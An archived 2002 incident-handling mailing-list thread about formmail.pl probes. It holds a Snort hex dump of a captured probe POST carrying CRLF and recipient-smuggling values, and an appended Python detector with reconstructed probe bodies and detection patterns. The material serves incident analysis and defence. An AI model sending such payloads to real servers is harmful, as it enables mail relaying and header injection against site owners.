I've been seeing these on my production network for almost 2 months now ... very annoying on my IIS Server with no Perl <g>

I've seen 3 different scripts so far. 1 is very basic, only placing the site name in the message in plain text. The one you have I've also seen and the encoded text is a very detailed reporting of the found formmail script (which is why I say it's a different one). The last one I've seen so far is one referring to VOID realname= (looks script kiddie proofed ;).

I'll dig up some traces for correlation.

cheers,
sunzi

----- Original Message -----
From: "Russell Fulton" <r.fultonat_private>
To: <incidentsat_private>
Sent: Wednesday, September 04, 2002 10:23 PM
Subject: new type of formmail probes

> Hi All,
> Over the last week or so snort has been picking up many probes like
> this:
>
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> [**] WEB-CGI formmail arbitrary command execution attempt [**]
> 09/05-01:24:57.641599 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x30F
> 62.49.117.114:2645 -> 130.216.35.105:80 TCP TTL:107 TOS:0x0 ID:20226 IpLen:20 DgmLen:769 DF
> ***AP*** Seq: 0x350A6D63 Ack: 0x5BFB5778 Win: 0x2238 TcpLen: 20
> 50 4F 53 54 20 2F 63 67 69 2D 62 69 6E 2F 66 6F POST /cgi-bin/fo
> 72 6D 6D 61 69 6C 2E 70 6C 20 48 54 54 50 2F 31 rmmail.pl HTTP/1
> 2E 30 0D 0A 56 69 61 3A 20 31 2E 30 20 53 45 52 .0..Via: 1.0 SER
> 56 45 52 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A VER..Connection:
> 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A 43 6F 6E Keep-Alive..Con
> 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 30 32 tent-Length: 402
> 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F ..User-Agent: Mo
> 7A 69 6C 6C 61 2F 34 2E 30 36 20 28 57 69 6E 39 zilla/4.06 (Win9
> 35 3B 20 49 29 0D 0A 43 6F 6E 74 65 6E 74 2D 54 5; I)..Content-T
> 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E ype: application
> 2F 78 2D 77 77 77 2D 66 6F 72 6D 2D 75 72 6C 65 /x-www-form-urle
> 6E 63 6F 64 65 64 0D 0A 48 6F 73 74 3A 20 77 77 ncoded..Host: ww
> 77 2E 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 w.cs.auckland.ac
> 2E 6E 7A 0D 0A 41 63 63 65 70 74 3A 20 69 6D 61 .nz..Accept: ima
> 67 65 2F 67 69 66 2C 20 69 6D 61 67 65 2F 78 2D ge/gif, image/x-
> 78 62 69 74 6D 61 70 2C 20 69 6D 61 67 65 2F 6A xbitmap, image/j
> 70 65 67 2C 20 61 70 70 6C 69 63 61 74 69 6F 6E peg, application
> 2F 6D 73 77 6F 72 64 2C 20 2A 2F 2A 0D 0A 52 65 /msword, */*..Re
> 66 65 72 65 72 3A 20 68 74 74 70 3A 2F 2F 77 77 ferer: http://ww
> 77 2E 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 w.cs.auckland.ac
> 2E 6E 7A 0D 0A 0D 0A 65 6D 61 69 6C 3D 64 61 61 .nz....email=daa
> 31 38 40 66 64 6A 31 30 2E 63 6F 6D 26 72 65 63 18at_private&rec
> 69 70 69 65 6E 74 3D 3C 69 69 6B 65 73 74 79 78 ipient=<iikestyx
> 40 61 6F 6C 2E 63 6F 6D 3E 77 77 77 2E 63 73 2E @aol.com>www.cs.
> 61 75 63 6B 6C 61 6E 64 2E 61 63 2E 6E 7A 26 73 auckland.ac.nz&s
> 75 62 6A 65 63 74 3D 77 77 77 2E 63 73 2E 61 75 ubject=www.cs.au
> 63 6B 6C 61 6E 64 2E 61 63 2E 6E 7A 25 32 46 63 ckland.ac.nz%2Fc
> 67 69 2D 62 69 6E 25 32 46 66 6F 72 6D 6D 61 69 gi-bin%2Fformmai
> 6C 2E 70 6C 25 32 30 25 32 30 25 32 30 25 32 30 l.pl%20%20%20%20
> 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 %20%20%20%20%20%
> 32 30 25 32 30 25 32 30 25 32 30 25 32 30 6F 78 20%20%20%20%20ox
> 79 35 32 26 3D 25 30 44 25 30 41 25 30 44 25 30 y52&=%0D%0A%0D%0
> 41 74 69 6D 65 25 32 46 64 61 74 65 25 33 41 25 Atime%2Fdate%3A%
> 32 30 30 38 25 33 41 32 30 25 33 41 31 39 70 6D 2008%3A20%3A19pm
> 25 32 30 25 32 46 25 32 30 30 39 25 32 46 30 34 %20%2F%2009%2F04
> 25 32 46 32 30 30 32 25 30 44 25 30 41 3C 41 25 %2F2002%0D%0A<A%
> 32 30 48 52 45 46 25 33 44 25 32 32 77 77 77 2E 20HREF%3D%22www.
> 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 2E 6E cs.auckland.ac.n
> 7A 25 32 46 63 67 69 2D 62 69 6E 25 32 46 66 6F z%2Fcgi-bin%2Ffo
> 72 6D 6D 61 69 6C 2E 70 6C 25 32 32 3E 77 77 77 rmmail.pl%22>www
> 2E 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 2E .cs.auckland.ac.
> 6E 7A 25 32 46 63 67 69 2D 62 69 6E 25 32 46 66 nz%2Fcgi-bin%2Ff
> 6F 72 6D 6D 61 69 6C 2E 70 6C 3C 25 32 46 41 3E ormmail.pl<%2FA>
> 25 30 44 25 30 41 25 30 44 25 30 41 25 30 44 25 %0D%0A%0D%0A%0D%
> 30 41 25 30 44 25 30 41 25 30 44 25 30 41 25 30 0A%0D%0A%0D%0A%0
> 44 25 30 41 6F 78 79 35 32 D%0Aoxy52
>
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> Am I right in assuming that this is just more spammers looking for places
> to launder mail or is it more sinister than that? I.e. do we believe
> the 'arbitrary command execution attempt' bit?
>
> Cheers, Russell.
>
> --
> Russell Fulton, Computer and Network Security Officer
> The University of Auckland, New Zealand
>
> "It aint necessarily so" - Gershwin
>
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
> ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Thu Sep 05 2002 - 11:00:22 PDT
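A defender-side classifier for POST bodies of this kind, added here as an example; it is not code from the thread and not part of FormMail. It decodes the application/x-www-form-urlencoded body the way a log-review script would and reports the indicators that are visible in the capture quoted above (a recipient given as a bracketed address with extra text appended after the closing bracket, a subject padded with long runs of %20, CRLF sequences inside a field value, a pair with an empty field name), plus the VOID realname= variant sunzi mentions. Every sample body, address and domain below is a constructed placeholder, not a value taken from the capture.

```python
"""Classify formmail.pl POST bodies as benign or probe-like.

Added example, not code from the thread or from FormMail. The sample bodies
are constructed to mirror the capture quoted above; every address and domain
in them is a placeholder (reserved .invalid names), not a value from the capture.
"""
import re
from urllib.parse import parse_qsl

# Signals visible in the captured probe.
# recipient=<addr>trailing-text: an address in angle brackets with other text
# appended after the closing bracket.
RECIPIENT_WRAPPED = re.compile(r"^<[^<>@\s]+@[^<>\s]+>.+$")
PADDING_RUN = re.compile(r" {8,}")        # long runs of %20 in the subject
CRLF = re.compile(r"\r|\n")               # %0D / %0A inside a field value


def parse_form_body(body: str) -> list[tuple[str, str]]:
    """Decode an application/x-www-form-urlencoded body.

    keep_blank_values=True so that a pair like "&=%0D%0A..." (empty name)
    survives decoding instead of being silently dropped.
    """
    return parse_qsl(body, keep_blank_values=True)


def probe_indicators(body: str) -> list[str]:
    """Return the indicators found in one POST body; an empty list means benign."""
    found: list[str] = []
    for name, value in parse_form_body(body):
        if name == "":
            found.append("empty-field-name")
        if CRLF.search(value):
            # FormMail copies fields such as email/subject into mail headers,
            # so a CRLF inside a value is header/body injection material.
            found.append(f"crlf-in-{name or 'unnamed'}")
        if name == "recipient" and RECIPIENT_WRAPPED.match(value):
            found.append("recipient-bracket-trick")
        if name == "subject" and PADDING_RUN.search(value):
            found.append("subject-padding")
        if name == "realname" and value.strip().upper() == "VOID":
            found.append("void-realname")
    return list(dict.fromkeys(found))   # dedupe, preserve first-seen order


def classify(body: str) -> str:
    """One-word verdict for a log pipeline."""
    return "probe" if probe_indicators(body) else "benign"


# Constructed sample 1: modelled on the capture in the thread (placeholders).
PROBE_BODY = (
    "email=probe%40sender.invalid"
    "&recipient=<harvest%40mailbox.invalid>www.target.invalid"
    "&subject=www.target.invalid%2Fcgi-bin%2Fformmail.pl"
    "%20%20%20%20%20%20%20%20%20%20tag42"
    "&=%0D%0A%0D%0Atime%2Fdate%3A%2008%3A20%3A19pm"
)
# Constructed sample 2: an ordinary contact-form submission.
BENIGN_BODY = (
    "email=alice%40sender.invalid&realname=Alice"
    "&recipient=webmaster%40target.invalid"
    "&subject=Broken+link+on+the+download+page&comments=Hello"
)
# Constructed sample 3: the "VOID realname=" variant mentioned in the reply.
VOID_BODY = "realname=VOID&recipient=webmaster%40target.invalid&subject=hi"


if __name__ == "__main__":
    for label, body in (("probe", PROBE_BODY), ("benign", BENIGN_BODY), ("void", VOID_BODY)):
        print(f"{label:7} {classify(body):7} {probe_indicators(body)}")
```

Feed it the decoded request bodies from your web server or IDS logs one at a time; the benign sample comes back with no indicators, while the two probe-style bodies are flagged by field content rather than by the request path alone, which is what separates a real contact-form post from a relay probe aimed at the same script.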